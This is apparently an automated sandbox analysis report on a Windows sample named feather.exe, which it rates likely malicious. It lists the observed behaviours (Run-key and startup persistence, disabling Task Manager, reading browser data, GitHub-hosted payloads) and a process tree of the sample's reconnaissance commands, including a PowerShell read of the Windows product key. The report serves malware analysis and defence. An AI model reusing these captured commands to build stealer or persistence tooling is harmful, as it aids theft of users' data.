Analysis Overview
SHA256
a4c5f72184b8bb06b6202074d1c81469ea56f74dace70d09fb5c798f85d8b700
Threat Level: Likely malicious
The file feather.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Disables Task Manager via registry modification
Loads dropped DLL
Executes dropped EXE
Reads user/profile data of web browsers
Drops startup file
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Looks up external IP address via web service
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Creates scheduled task(s)
Uses Task Scheduler COM API
Checks processor information in registry
Runs net.exe
Detects videocard installed
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-12 15:12
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-12 15:10
Reported
2024-06-12 15:15
Platform
win11-20240611-en
Max time kernel
53s
Max time network
150s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables Task Manager via registry modification
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\feather.exe | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\NT6\EvilGoose\hg\GooseDesktop.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1276817940-128734381-631578427-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupE6075N = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\feather.exe" | C:\Windows\system32\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\feather.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\feather.exe
"C:\Users\Admin\AppData\Local\Temp\feather.exe"
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4084 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4084 get ExecutablePath
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1940 --field-trial-handle=1944,i,8685083057860398716,68623718888963643,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe
"C:\Users\Admin\AppData\Local\Temp\2hk9jVms5WvWmk3O377CwL22qEI\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2060 --field-trial-handle=1944,i,8685083057860398716,68623718888963643,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "net session"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\Wbem\WMIC.exe
wmic OS get caption, osarchitecture
C:\Windows\system32\more.com
more +1
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController get name
C:\Windows\system32\more.com
more +1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4084 get ExecutablePath"
C:\Windows\System32\Wbem\WMIC.exe
wmic process where processid=4084 get ExecutablePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 110.0 (x64 en-US)"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
C:\Users\Admin\AppData\Local\Temp\feather.exe
"C:\Users\Admin\AppData\Local\Temp\feather.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
C:\Windows\system32\reg.exe
C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
C:\Windows\system32\cmd.exe
